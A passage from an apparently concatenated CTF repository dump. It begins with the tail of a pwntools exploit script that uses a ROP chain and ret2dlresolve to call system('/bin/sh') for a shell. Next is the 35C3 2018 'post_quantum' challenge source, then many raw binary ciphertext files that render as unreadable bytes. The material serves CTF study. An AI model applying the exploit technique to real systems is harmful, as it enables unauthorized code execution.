for ropchain") payload = "A"*40 payload += p32(0x804a500) payload += p32(0x8048446) payload += p32(80) # exact length of stage 2 payload payload += "B"*(64-len(payload)) log.info("Stage2: Send ret2dlresolve executing reverse shell") payload += "A"*40 payload += p32(0x804a500) # Read the fake tabs from payload2 to bss payload += rop.call("read", 0, addr_bss, 150) # Call dl_resolve with offset to our fake symbol payload += rop.dl_resolve_call(addr_bss+60, addr_bss) # Create fake rel and sym on bss payload2 = rop.string("/bin/sh") payload2 += rop.fill(60, payload2) # Align symbol to bss+60 payload2 += rop.dl_resolve_data(addr_bss+60, "system") # Fake r_info / st_name print (repr(rop.dl_resolve_data(addr_bss+60, "system"))) payload2 += rop.fill(150, payload2) payload += payload2 payload = payload.ljust(0x100, "\x00") r.sendline(payload) r.interactive() return if __name__ == "__main__": if len(sys.argv) > 1: LOCAL = False exploit(r) else: LOCAL = True exploit(r) ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/challenge.py ================================================ #!/usr/bin/python3 from BitVector import BitVector from random import SystemRandom inverse_error_probability = 3 def matrix_vector_multiply(columns, vector): cols = len(columns) assert(cols == len(vector)) rows = len(columns[0]) result = BitVector(size=rows) for i, bit in zip(range(cols), vector): assert(len(columns[i]) == rows) if bit == 1: result = result ^ columns[i] return result def bitvector_to_bytes(bitvector): return bitvector.int_val().to_bytes(len(bitvector) // 8, 'big') def bitvector_from_bytes(bytes): return BitVector(size=len(bytes) * 8, intVal = int.from_bytes(bytes, 'big')) class CodeBasedEncryptionScheme(object): @classmethod def new(cls, bitlength=48): key = cls.keygen(bitlength) return cls(key) def __init__(self, key): self.key = key self.key_length = len(self.key) self.random = SystemRandom() @classmethod def keygen(cls, bitlength): key = SystemRandom().getrandbits(bitlength) key = BitVector(size=bitlength, intVal = key) return key def add_encoding(self, message): message = int.from_bytes(message, 'big') message = BitVector(size=self.key_length // 3, intVal=message) out = BitVector(size=self.key_length) for i, b in enumerate(message): out[i*3 + 0] = b out[i*3 + 1] = b out[i*3 + 2] = b return out def decode(self, message): out = BitVector(size=self.key_length // 3) for i in range(self.key_length // 3): if message[i * 3] == message[i * 3 + 1]: decoded_bit = message[i * 3] elif message[i * 3] == message[i * 3 + 2]: decoded_bit = message[i * 3] elif message[i * 3 + 1] == message [i * 3 + 2]: decoded_bit = message[i * 3 + 1] else: assert(False) out[i] = decoded_bit return bitvector_to_bytes(out) def encrypt(self, message): message = self.add_encoding(message) columns = [ BitVector( size=self.key_length, intVal=self.random.getrandbits(self.key_length) ) for _ in range(self.key_length) ] # compute the noiseless mask y = matrix_vector_multiply(columns, self.key) # mask the message y ^= message # add noise: make a third of all equations false for i in range(self.key_length // 3): noise_index = self.random.randrange(inverse_error_probability) y[i * 3 + noise_index] ^= 1 columns = [bitvector_to_bytes(c) for c in columns] columns = b"".join(columns) return columns + bitvector_to_bytes(y) def decrypt(self, ciphertext): y = ciphertext[-self.key_length // 8:] columns = ciphertext[:-self.key_length // 8] columns = [ bitvector_from_bytes(columns[i:i+self.key_length // 8]) for i in range(0, len(columns), self.key_length // 8) ] y = bitvector_from_bytes(y) y ^= matrix_vector_multiply(columns, self.key) result = self.decode(y) return result ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/ciphertext_007 ================================================ >pȺa.Tlqbd;Rw ꏝVYآ1QXӔۋJ Ms۠ /[sgWFWGg5_*|B4nEG1;+h4Fq{9 Z% *aVpVIa _Ԍ"!|w *%$eV2]7j.}yW_Ȭ6Ms|I`7{((<K3>폑+s\|x2&h=rK{I7GEUG0]Q\R ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/ciphertext_017 ================================================ mަehWU߆j QN3NJ#?j:vn'6ه˱;a!*l! |Gvp0}FLQ!>,'Z^mk;m")~`cxrS&y޾B߷m:!]7/ByCz;.5 P-vJ!s[Yqai-qƖ 9A[ӷP:mp#(V+xmV!8N1lpj[g$s1^{L ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/ciphertext_019 ================================================ N<LUC^'tx[Qb-:Q}EHs\;t5 C;ޒuFZX3S3i۫y\|b|eĴ9(Q+UNHd蚣<˧1I9E&WqQ]BW5_~`4;Pkt3c$ܩ曣!\(Su.ϖFi6a3ph;!YM@Fl)eUD Y/0/Ȟ$) ~UX_ v+FY%DJ ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/ciphertext_020 ================================================ ^0@$ #WcEnRMmzWyzM4I:Ȇz[[?Z7tDvz 硎VFsڄk~F&w)QL!ShGZu-kr[ 3X = c)KDăGsbF =|mlJuE q T{]$_z$)GCk=ٲPgTU1Ye3R!,lkJÄJ- MTb=8g&d!: '<FaČz ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/ciphertext_023 ================================================ ED")po  +#2rуJ =.Sj@mSPFtitcՓ58ܩ`]=xAlu۳w hI2KhRe/:ఴzDb'8d, +\n7OrJu a -( .և»Wu)}؅]"1/U glJ}< ye;Ә<Ԓ%W~S×`2Z, ^%=ם;&7$0Cͦ= %Ek|ze0/4E!b&LWz{O,:7]d `7cFXu̴7r4 ̘x!Ȼ%L&(={9-t)n[d+"*vf1~v+ۃ]Kzoq]r1$J4 %r ̗H/d?qn븹@/ yw4{хȎF= o9 ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/ciphertext_029 ================================================ wpnD߼\/ENFW*9]wG2,3q Ѣ^d+0* [Avud(F)9#r8~:ry`4x匈ZN& t14eLU8%itZ,#PӮ߾c㻥ۘP=:q>¾e U iu" 9<u΅o%UMDK#MӪ%8."4Vq[g-쎹%mnpj/9"X4$s`BPU ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/ciphertext_035 ================================================ ڽcr,,·NP3͹B۱xn#Iz欠ҜOZ\)9)Sw QB@'͡%qd~}GH:r PpOq\b٦ ËznR%M%v{'ۙPXoK [n,^QBD1?-tj[-N+s1گ4x}SyrBFCij[D].q̬eŅJ㟳SON2 H,fw͙'2 ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/ciphertext_044 ================================================ FU ?2Bn4ʍq3矯?-1;U=0׊R6i]hq|*97݋piihGggϵ]<3*SPYy-jȬT ?&s̤0d7Dcd5] Wv;7Ց:G8ʑn+)T0e4RfV+K,UD+U\$ؚ_$arA Փ1DJDܚJ)a`I:G ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/ciphertext_050 ================================================ N:N2%Zg>ȭ o9H"yJ2?%`Ӽ>E*84_b1uK.c $^m{I2U"zv9t1JvDL8(Grҁ~1%_>"[iKAթͬ[H0w )*|¿);.x^V_ҭڪ$Pqz*'56BkQ(C< b*+ȋω roB8ؤGPuGY+)cz9\0/ G'/hߵF8A9zNm F Fz/,KUYge(A%5`D$f#UԸQ)U{+AJAWzQP\mᩃ$h sFȿUeKKMu^Q]ףC:Hz,pVѢfGx5*6LM="{u h؂I5Ziú=5ZwH 7pZ)/H y ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/ciphertext_064 ================================================ KOh!0L5`EgsD<]&Wz$Kɬ=sV1E/ͣ%>W؇wd-~O, pF7qmト>娈b;B h)IwfQA 9EŇrm-8B8spgH!/G}ȴo"/jS>磌rS>r}QKO FCu15ݶ] i`^uorӾ7ï_lRvދR|vr'kfdEF4: ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/ciphertext_065 ================================================ 85_Ϸ^q{H5&@(uN?׭=}O(0r>1"Bs4,5~vDurl;ޞEC:]GJg%r?㢱1XdbQ=Aˏ`C|utf4'坄ݛS2p.R`܊q4LO[!nYX |S9H%HNˍJgԦ|* V~A3H}^9-xe7W-^ܢ2S )6Tm)<;iR+i38m5E9&&%od! Wh)+L!]w}糦H*wg8%/9:en;W%;ێ:)73257ieTnp _2½ҕ0Higk0곁Bs` ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/ciphertext_072 ================================================ &C ^(f]Aon ?2#c;^8\B 9(<~Ã)J{ Ot1)m$L _A㥡,JC)湢 #L2vyԿk΍h5Y,< QyGsaŒJZ@ɔn[jf.U fZj90v'}K] fq:]wrmu}ٛM3Wײ',W]] d6|@NIBO7HNkrGJ%,y3[<]κl Nd ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/ciphertext_073 ================================================ b)*ܫ "yJTiIh[0MR S8nYx;Y^ !9J`j { ӭ)g\0ʞc4S7q,5~>L7y國 HdݞiY(8nC"&D6~ѸC7ZЁ,j K<)G }Fŷ8!3յ x >io^0 t ĤuLuh1ް% G?GBփ}D֞ ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/ciphertext_078 ================================================ 9ؤ< ﳮ0{w%vt1'436G݆SAo3@yRWH.'ӄ#/%AEo zz&[ $RQp 㽗6'Yu}ykH(\V ;b 1yԘS^qF]0DنL(I䔶,ヲW'pLDe0-J61 V߳J\3!nfX~uQ?OKEkpj:F+1"%?x+| ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/ciphertext_079 ================================================ z,h?UӆaKloA>C\ث^j:ewi hUF9}@s'a5\PuɦB`S3+1^YJ[2 v 'v-@~]vjXC(cfkqEˎ#vELp0\? =u9β;NhaBVnE,Ҫg? h*4ԭ0|Zr(;x.c(ژ]\^" ؽ/-A!mZd}QtI^_[Ɔ ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/ciphertext_082 ================================================ b!tW(,8Z0R]LAZ*}w3^ے?5ѐ:; x,$L͍a_;ØΉG>".*11L;֎'ya|Լwll>D rVMnEvK)b ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/ciphertext_088 ================================================ d2~h9رaO)V"[zo!,~9Ij‡KJn&p]t6޴p`Ȍ/{QMS zFtrpb(u6: @߇dA"*?EwuT#YP2]Mwg-aj9K@s, c'2䭛C͡@{#p [ E4,0J_E؂"xEΆN69yȑ%(Kx2L{T3u td-S!LR[ra>]=7;X/[]Z,9;<`. :C񏶐Ij'H iPՈ+6s `7ZC}DEȵ(j/UYhH:Y%5f&uRZ0&_AW"TB|W4rgwjR}|v&)ama >Jk ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/ciphertext_091 ================================================ C.cvr$kxa_Ytig*^PjR/(E!p" ;˭~삒v7Đ7zન/*t߇B5=驐bϠ;̈o ۴+xE f$C$0_ouǢvfk{cJ"&'ʜߊHY [KSJSR\vX'SIK/Vex7_Uѫ`*a4lkʟ;{4 q8]OTQk•B$Juaz6 ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/ciphertext_094 ================================================ ZcTH}.U:nHꯛVfL'CpZoē2i0 :5gIxC0huĴG٢<3Jݗ 8_tz)lO3qR~~On/~@ Bk7g.xtYqx#DlNW><"Q&]n{Jؒd/?M qrN/^T9[ %hQ嗋 ǝw_7x\`JPD>nk3YD= ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/ciphertext_097 ================================================ xiE-cy VMƶbʬ8uɅ>袍V< ADw!T&yo))  ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/ciphertext_1000 ================================================ r SҢrq4u&/i}Oף` 90TR#H ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/ciphertext_1001 ================================================ B%,QSX(3Ľ!Zw,h̕k>D3 k8_;}t}`f˚ujRnͦտƏ6fMu@I :TlWg?9!ll\s-ͮ3k.n3Rfg>6Cu=0 pʕ vLW(`l*μ Eƣn4lz9hSF\X_蛁O x\o`1g6 s;VC}oD T~1QT# ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/ciphertext_1007 ================================================ 11Tnȵ[M\%okvO2#kS*w>wIJ0es]}R`%G͒1g nfd^8~ߠ.?>e$,ۖ;ө۟+ qƀ' @75[6cr"X֚M[__nНvͨ󾤁1#n⺋{/1W ņ YswQ$/I$;`*"Qf3X - }T>s)߉Ëyvۊ@÷-dfn^ Di/nʴ׊O|\Czd y7qs`׶ -b_~Tj3 ̠kbN"wNB$mު$QG!:-^ ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/ciphertext_101 ================================================ ; W-PF]E"x|ډzC;o a^\k;;fPo`PsUp'#aGdA҈UvzxYU9OϤ=dYd+Zh+5j ΐ(/z`cnÖc8|~FoGcMF?I"cc"SgsIXW.]FIt5o.,q1S7ѴBBV}M3FIH(r45 77na=QQamam ZE[u<۰䭃cxǒ* ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/ciphertext_1012 ================================================ 2қmQd\S("0vܤpWى6rqV w:P-s8_!gͰE;\-ngԬoJy\&ΗpT͏2_ [iίkvU?g1ws{| efޓ8t*d={̽pz{ϩ!9w{܇iDSafkya d*SO %F*9o5iD}ܡ.gWmA\l꼅Rӱ2 Dyf͐!@S $90~&P ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/ciphertext_1018 ================================================ ;ev9 xﮇRۆSRhZ-^[9)o;V.۳GpG'NtfM$J6iv ziF5s텖R7FJ.7{3%jݹwRP)5bkp%Zf5J܌]|'zbOx r}e xwuY)+ᨷhJar\:~*N׺x+IxZ^Y lS8SuAcDDXh+{%pWޮb -6{ƷvʹܜIg/ 'ĔdAw ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/ciphertext_1024 ================================================ +ۨU}?1LݸAVe p4\#hT.&STPʭB"{&Dq 5"dz 3ZV_0CBIiOMC, <1-t@yXY`c57]|0. i#A䪠z(P,,}T61wӢG7?O9%i=Hkt +n~"6SV2ʟstp ԥ5D2@+Re7FR7,l$MznkM&ܵUatЁ# ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/ciphertext_1032 ================================================ j7U|Ԣ*"ֵ(2 +kDuC}]/ATؓ'ksGx f^6؉i`P5tXBhyri eiQ!w}bg[ag5չ&_eM1I=_P\B]'!n"{M| BzthpᆧI%BqWաt< k۾כR3`)gL ΨIT(%k>@rሧR>0 ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/ciphertext_1034 ================================================ 3dؚCcٻUCY6\OeI;z/&Hd^ۣDo5ƧfΖ&8{ĦgY%E- KN2wj'u,\vhöXL eșG'@5UkMA<.[1 t O'8i)YlrfzmP#jKuM`&-{:1_z~>J- v{W"~y-ѕ=dr:.!8k sAů)OF- =[Y'oT}S?KJ&^*Dc6 UI)ӗ* A1F̕ج,6ࣁ#w$ )zHϺvHѽ'Wu_9 M `0άg8,h{=z\_Iu {aF aoZ32b-=+t! jdLOMu|!ɏ'X} ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/ciphertext_1041 ================================================ k5tU&9,dN"QPnOΆInK306w4)6c'snvtV0uԴs!ɑܹge3\<{gX$>~5Pa⺺Tnjn c3Wݾ>EIꋦYվTŽ&%lZ܃GWdvϫiCz8By/N}yo3y[Gy ^5gz5jaT'd݃82[Go-5kI ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/ciphertext_1042 ================================================ 7Bo `jK! TɢS26\/9*LMʶg8YX\Z" 09=;^J,*k#+P ֛v.s*)$IB-NJJO" "s?jx*b H T:*C#5VR(>,Y=&_Z:kwO5aW{:O\W 8Hߞefَ^Ӹ.8oJ7N\8&k~;絗\~پ6 ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/ciphertext_1049 ================================================ gNioD+Uv^ofnÛ "ke 9BL6Xi9aF~Ё7m>XCh|a G,2 E}zI~)ʹ g峟c 7n[YO,~^ $j]n%1HH ~\#؞A X(e0R>\w /\cO ?E~vO^^}E6"7Y m1@/WG+~irS؎5g ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/ciphertext_106 ================================================ a?7S&,by kĔy}u;p?EEAXчktWT"f}*jKS_n>8BPkwO4v4!M?DqZnv!m `>WW2Z0hOd (k8*t3~*Qul\\}$* m[l{?+8V.dZF&\g:oCIS=QoEv!)qdɐ$8j菁rh[B ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/ciphertext_1063 ================================================ k ]DF pZ4.]5«[&֓wTm3O*yi yy>?B+]91_rxaM(7cM 55A-~jncܼx3,a >;M='I(Gz<[m_%+LYAPF`@C&(Y1K:'b%pByBb P<.t c,lnF1).@5+Z}$ :npE]!Qns`zT&͞OTjD'VE#bt|uW (>%yO Zgt' PTGbV*ic؃rp1\tַLrXh3slqY ِQa7Gfݒ"+R{ w n4wU0t  Vra0"_}+ ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/ciphertext_107 ================================================ KB r n T/$Fsz2*-I(0W8ҥʎFJ5sA8Ip6s1D m>SZ]i 9|YWпe68*AFl_iyЏ0S;]c x! "2EMĻ&zR5'cThFXOߧ(q:0bvFtgy8])4{B$ n(tԜ0Dy7bk;<8 ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/ciphertext_1074 ================================================ :l;o;` =,%xBS(~.M1q;7:""uҧȈG'/0a=]92?JπU_k˹fU=Xw}jc#I*akUGrؕAS[7j[Oh EuBv됾D3ٝMa2;ٽgB4> 9.f_'·?"C :}$T$8P1y8o6yCLkF;VV!4 ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/ciphertext_1077 ================================================ kM⍘Y|zIT\x"vhpdA^ e1Pϰ\rnHJ oV6i 4ISh}*Ϣ)իe %i0DkY.mJe>?,ia5Ko$h_Ig8 XT,} B[/c)xG!ƺ1dPQ#hEUF9i̸4j)RJT~5! ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/ciphertext_1078 ================================================ @NPlNX:KF|t| F|LEz&p8ۘMZ> ty\2hY5ZjIbk#v` Kqv% CT-O |,SUTS<`~{&>DcA/iSٹ&>, baX*ہwS !lKo3Hp`O9lM 5w2Ueip&ZI;NKw#zREDRXg7(-Ll9BVw+z\˫Ls ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/ciphertext_1090 ================================================ 5J&N)5GSؐޞR( w2~⿎h;SG46~pd3E6HYv[9Oʒ=LA+;N>u6-~߆'I$'S5Lt5iK$/ۂO ]x+E_zaur;F1DqM/XAF 8>yꔜ lݴغtFdy1[^J+ LH<5#puVH"9fD k1/Է W+nI|] ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/ciphertext_1091 ================================================ 8ä3TlIsy"g܏k,4t)eP-O ?t9<߳|vmاܖ ~,g?un8&OatNhVL+kzдצN'mZ l13[>I/pk bB! U!:u*@T ڏIT5pFAΜ'ޜhU2%:2l{x4{) ?' @}eMyc|&pX!B= ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/ciphertext_1099 ================================================ R5&0?ee&/}R+o f31v^oJi -WgObάwv.ubz1OVh#ٞ ܆U(t n)Y6? s}\L[׳sr EcmT9,'6ΆG5ޒkY [AK3^lg/L)nCGwIK~-gT!ڨ#M"DU cZqHqMV} 5Lsa~b/^ȧ8Z W(5zsTosj(q<ҩ_ߠS,hkaF%Z$aS)V_3S0HQ8(^d4C2?6M.H܈n%/ Q7O` r+KH_NOSE^qOTu UO?p' ,3{8mj_?׷ "To64Z|:#*o2 ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/ciphertext_1100 ================================================ )U޸b*(LQqΝ/sh9FoّwV{jR#Rs9ϙ}Υ-o6^rϮ`ӣWb0O( lo6s.~@DN}l=]`E{jRh͎@!}}{;, Ui+lHЍ<[hz1fȧYz}[3Pǐu*igf79h0T|0!~xyg7 D7֡  Š 'X ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/ciphertext_1102 ================================================ `ό5faZP1I5n6UNR軗h | /t2,j>/Q@>A,fLTmL~ldZ2gz?Hkm:F볪|{uD_ 8Uƛ"Lz?if&\EPɯl*ZcB:ze5-h~i񢢿Qb9 H؝u~Qa (IU],NWUxq4Z  TRBҢr֖d 28JDhpeod ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/ciphertext_1105 ================================================ K z{(36%yi;3,ե+v_ECQ~%P:O &LEpYӀ atQsU t |n}>}!oB$/>5j<2y7=Jc EV vR+XDsK}O~*7K ^UTdW\6"{#Ikd ֝@\91&".c H{3)NJ78bji ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/ciphertext_111 ================================================  dϰ.Z,Ak8V^ 0CJҚ,-gB9⦉~;1t~-=h˷bTas␉"@# +Nxj VR""J%Mٛh/ #+-y&aɋ\'M;^;u_aXMZwn"ɾ=AnNg1' D~N-݅RoA n+i#Lݚu42ZC#gA-\hbX_e+ТkVN^"*_$t]껵 <f_ ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/ciphertext_1110 ================================================ .Dit+$s:@=Ǟ'•_7KZ+۩qS'̞%M<"K1Y%>rUNjΰGH!>_鶣#G> Iq:T/ensT}ig~."H)dJQXbgDi Ԝ:0ΊxoֶqVdbğ͚-G؞ 3`mLn)2f:Eo t'嬕mjKâ|%UnB߭J8=M_o~;jЇ!̤Z؍1;{ ooxk9Mq?VŃ]/:3= ΃Qb`|MB!U7ecfY؄JvYjCL5>h:#:Źht͇ᤫd7WHfT6~gg箳)7zhG@+ ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/ciphertext_1115 ================================================ n7CL|ݟI~N < Pd !Y,8RA2tFK2T_%^[ǴS[[Xʀ>h0A@,ҢzjH _$csJqn8t!+ۈ`jHiE \ s}Q1_ aHDtOLRMq'^0/۳/aAdN~g9Wf2# TgiVԷ-0OGn.`91, ΩAn-_a!;R ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/ciphertext_1119 ================================================ ub81mtWC&W:>E{CR7My<=9tzk%0~-íH@ȋm$h*bf*=Alg2}]u#S&MÑwlPA7"iA  BD["2V*uזlgTl} c[Sv?me63!վ#%Y vLЯ1 <}+tcU?9Z2W9 (wT)%Z.P'`8(N6ɍjy轥 ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/ciphertext_1120 ================================================ FyZ4pi钲9z'Ϛz<8k>MUpzä$VF7%=Rz伄CV-vΝ[:vN}kq .N'x!YK۲a]Y:2ϑ8.dsp;˅1p0K.48?a2Pdf}UFn" N\^t<nRL}N_\OW w 7㈱fjԨ z9٫xa3dzƛ6^Tn˸kM4س ѭXUa ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/ciphertext_1121 ================================================ ӼSTk;_tPx@$iD5U餎DC>1#,J# ]A|[?o.KU)2Ld^P.|.Km-q[ǧTPPK#LD9`SLiN!qN)1PQ|3_jlhvz䖌F! IĴIBje#B.;)ǎkI=a)s z/ &:ɂhϑQ֋Nn,E#^ \ߢ⾵,+ ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/ciphertext_1123 ================================================ ް͒qcEN8u3mc P@ݎGҔ 5H{J@xW >ThcQvx~u= dAZ?әM*&Mrg?$B[tR;ikD$0jO6hc ?^b¥K& S)+. (.tBF^v=2fx2x!ȯ~_[<˝Kа@t2(4[֜ cőINCvx6*+ͤG:i3eƬe7CL ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/ciphertext_1125 ================================================ |OHCf*k{!-k ڳQER ]`:.5vGӀ3Q*eEQVlmʂkHr`,xZƖZc]'Oa`FЧktܰPn,C|&I= <*PL?WnDсhrm]|:>8C{ -j/_ ."c"M|B[аڗlf9ԜuxX~{h91+4"޳*u`@.4 ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/ciphertext_1128 ================================================ ZYLż ʖGxǂ5 D?"qBٮv ^lyJ#g2 ^TG'@5W sg-.R;[%ރg{ [TI0gKҚ2j}&|añ Di'0 pX 7OQVI6\8aj3F LؤyK!@'#m7fC&VGn 4uNFTE`6h'%( ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/ciphertext_1142 ================================================ t3Y0*bj\H;t8AgVk8 H33+0j;' muYzxZ E$ciu?T}w dݩ 7 m͌u9},圛Us=ͧ@i[( N/̈́U[d&i:xYgt֮P =E,iV,c# U &{Q*.|5v"fyA֞"%$p]eol/x]ּ#@|#'`ʆ:4)4D? ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/ciphertext_1144 ================================================ 1՘e$kU>|nTi5s!Q;AW[}`|`q{~5Bsnld.Gj PB`^ik1|4'ϣ扫 ^"g 'kf7?ċ|8Vn.%dz05XaӃU1{R5 <ϦKn{ɹTًKMWp^'  zEIcU-CjmiZ`O1YXkA#90@}ס+zOL>sC4H$#SMy ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/ciphertext_1145 ================================================ <-fP7K͕HpO]@W@6ߵAsF-T '%rd{}|' &3=\E̔i/*`MI7aZ8IkpqNoHӕ),n9:iq֖m֪|m+q42]3-<)jΐ-5Ce_X:Q}|yLnk--0-O&L%vac:nD=Ⱥ ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/ciphertext_1148 ================================================ RƠv7Y"6_DނoBm!UFȞ+ ?Z Sa2d",&)bG<@hzYdRj?QG=ܛa2+|œa5Oֵ1_IJAis~a"?뉩AA%ZʛCl V&|];J2hvq*TjjI3W[uO0ev< sƃcDGy&Y6Z _kI<'`5 #Y[[!s FF!c5=Xm$+ ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/ciphertext_1157 ================================================ l͹xGo67[-(_JTO _sL_aKHs}<(=6W?<7 Q w3@? 9Ze9pb[M%I﷯e4 d`IJB!kAŋ[􀐘u^Sۡ즁oGledz0/P E!]G9:Wǥ˄:p>IH`+c@I@kx7Ge!;,Qڮ-= e+OU3ݽ$R ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/ciphertext_1158 ================================================ LK @Ӳ@ )mH g B5p\܍F:(0I,<6]Ƽ_IADŽH31O~#\|Xj!!ᖂn&R] &JSw8#ܘwZS!sT:kN+ }]Ld+_UM;0UuoX8u8 ðT6|/T?X*吵n1|X:e9%:'{XOj ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/ciphertext_1160 ================================================ ?eQ($ QHC`6^IF{OjyYQpԶ t?6x S]C|:>p`qB;%\Zb5uOg䩙)rh k'Kl8į !!y²1"O$Mɸ7򳲵Z=vJb؍Jv{ى5xVbuUhÖB>~NIX.7!UX R+C10E{'YИ ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/ciphertext_1163 ================================================ n&?T?t|hQ`OMW23( ˉv1dA<&&뚤DwּL'Ea=Ĩ>cr@1ovŐ֋Jd+^>6޴rvѣkƈ능'v@a K1{O25Kyuw-;K)G& ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/ciphertext_1170 ================================================ < Z3<0(NZɋ{_ @ W91m_ 1%:BJQTY]Ϛ.ގ"kKOg}67/dWnlT_L]S??Fn|Ey<#|/u4xz{9|#jMRVWھ ` șL@ [9L(P5H08p+&$y>N/?ⶮfٻN템/'^pZ5,1[Gs%#"*GA'exQ+ ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/ciphertext_1174 ================================================ g tt?OFv7kG)O9<.yfHLN<q%4UVK@TA+?V.z:pEMHn a%/.>$Iud8ŧ"kDCt. u㬦B՝iN1/OT:vT,C8Y E1* D&*Mpl $7'F0׸~Q.03| s2݂|VΪ]TpG{oV"6BsNB9*.`H.}NĄ|Y ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/ciphertext_1176 ================================================ ݳY+Bv(ǙiI2m҉W^{y^=Q/~~1H$Ը&z-&1ץ3D6(Rή#4gVF2,\0)g鶑`4GҪ*440g*0[%zW^Z^q]??CLŒ8(lfWjaw*ōW͏Vԡ7Y׉텨;b[X< G->kW{y&Rj^̣ ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/ciphertext_118 ================================================ 1|q_.**ݨAڦfE~P[d4\#i0(SUKM$v8Eҩrdy/[d&餛p\- &8t~൐B3 SI/YnheU*~/Kxq+~/|md\{|7Xf'@6vh Y!*Fǰc>E, H &Imm:DSQbPv_d4G[b;|-IsdP.uRMV9^ ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/ciphertext_1182 ================================================ 3 vH38649I=9k +=sPWQZk.sj=f 2>AQF_ZvLڳŜ2x>]|Ϧʆi},Y/\&yl)EװXuz=mG8_q>uuLmZBsGEEpO5l1A9vŠB{~qLW g dz<4Z/ZJ.ޛ<. G4cp-WFh9:Or43ax$D$[87Be ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/ciphertext_1189 ================================================ m]>=KN_-'͖G[Va^V[ !}26QFɐRP˻3sUjZ>&_\dD8GVq#@7o)N⨣f+:D΢WXiTirhNus;8}Aı1OVO>;F9g}bRa18s Ӎ黻cwOdž6Ի&ɭGa2OLG[:V26Z zF%o Q*[)\cÄ޻[<}~;)C8(1 ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/ciphertext_120 ================================================ +A"zgRHLh'f2rsG0|p_#m@w弘 $D%{}FɄ %"1GvrݴфJ!y%=⼴ QMvgRkwoM 3Wֽ"')#EeZjZAKC/7y~yl{S#[0.QG.uDZGIW(ުl/ߦe'EIdJtd`ïB6 _¥4F;J Ń%Ѱ-M+Pp(Z_j\\0j9;u'wuG ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/ciphertext_1200 ================================================ Ĩ@DN|WȍuL3ĮpІj)8eL'|תcgH?0DKa6kdAzśA2O]]xTfEcԿM3 "FBh?d<7w#dJO@ xG7_ XO~7b3qG*$ C+tpRtI]H MEOhhrL{*@V<%) -p]l[iOnh{: 'j=.S، '|n3FcGԳ!Ӧc"焷tό4y^L3gHqIjZSF{unj8"(6l1ut ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/ciphertext_1207 ================================================ v&sGf>Aw:\?s>[.W8C]AHNZ=Zê rn99ɖ*AsPOȾWbj}-FlԾ 2}.YT۲V7?ZF9Zã< -^%7mq!N|<#c 0heIz;Rn&H[/9GPRT 1-Ys%KXZSɧn\Ϳ~uK v8VܲLo7WX#\u?\xU%KF ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/ciphertext_1212 ================================================ MPv 